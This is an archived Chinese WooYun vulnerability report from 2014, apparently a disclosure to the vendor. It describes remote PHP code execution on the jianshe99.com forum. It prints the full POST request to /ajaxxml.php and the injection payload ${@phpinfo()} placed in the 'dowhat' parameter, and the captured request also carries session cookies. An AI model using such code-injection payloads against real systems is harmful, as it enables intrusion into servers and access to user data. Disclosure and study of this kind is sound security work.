当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058009

漏洞标题:正远旗下建设工程教育网论坛任意代码执行

相关厂商:cdeledu.com

漏洞作者: 小夜

提交时间:2014-04-22 12:17

修复时间:2014-04-27 12:19

公开时间:2014-04-27 12:19

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-22: 细节已通知厂商并且等待厂商处理中
2014-04-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

任意代码执行你懂的

详细说明:

问题出在http://bbs.jianshe99.com/这个论坛
首先随便的打开一个帖子送鲜花

1.png

截包

2.png


POST /ajaxxml.php HTTP/1.1
Host: bbs.jianshe99.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://bbs.jianshe99.com/forum-5-195/topic-1640176.html
Content-Length: 43
Cookie: Hm_lvt_b1646d7bf285efa474ea14b737e85446=1398006309,1398038153,1398038200,1398098132; CNZZDATA30039606=cnzz_eid%3D1561868909-1397929499-%26ntime%3D1398098133%26cnzz_a%3D3%26sin%3Dnone%26ltime%3D1398098132385%26rtime%3D2; CNZZDATA30036801=cnzz_eid%3D1271367639-1397929499-%26ntime%3D1398098130%26cnzz_a%3D3%26sin%3Dnone%26ltime%3D1398098132527%26rtime%3D2; Hm_lvt_d7689cf300ad742cd047593afd7f1d2f=1397927729,1397953140,1397990922,1398098120; Hm_lvt_89a2a3bf00cfac7dc961b07b7b987201=1397991764,1397992593,1397995371,1398098120; __utma=140739757.702307227.1397998349.1398047437.1398049746.5; __utmz=140739757.1398034245.3.3.utmcsr=jianshe99.com|utmccn=(referral)|utmcmd=referral|utmcct=/global/login-new.html; MemberEmail=""; emailNotify=0; BIGipServernew_bbs_pool=2030083539.20480.0000; Hm_lpvt_d7689cf300ad742cd047593afd7f1d2f=1398098120; Hm_lpvt_89a2a3bf00cfac7dc961b07b7b987201=1398098120; SID=459274e4bcb7dc35eb1684a125a1c4a9; Hm_lpvt_b1646d7bf285efa474ea14b737e85446=1398098328; ssouid=a1095150228%40jianshe99.com; viewtopics=W1606386W1651999W1640176; topictimestamp=Wtopic1606386%2A1397469668Wtopic1651999%2A1398006517Wtopic1640176%2A1398067880; VFIDS:4=0%2C7%2C195%2C6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
act=plv&dowhat=canFlower&fid=195&rand=84375


问题出在dowhat这个参数为${@phpinfo()} 然后我们进入http://bbs.jianshe99.com/ajaxxml.php这个地址
劫包改包修改dowhat后面的参数post发送一下嘿嘿

3.png


哈哈出来了吧

4.png


至于危害俺就不说了不深入 不拿shell 不看用户余额

漏洞证明:

4.png

修复方案:

你们懂哈哈 话说你们上次好像有点不良厂商的嫌疑

版权声明:转载请注明来源 小夜@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-27 12:19

厂商回复:

最新状态:

2014-04-28:已经确认,谢谢关注。

2014-04-28:貌似没有作者联系地址,刚索取了地址,有礼物送,谢谢。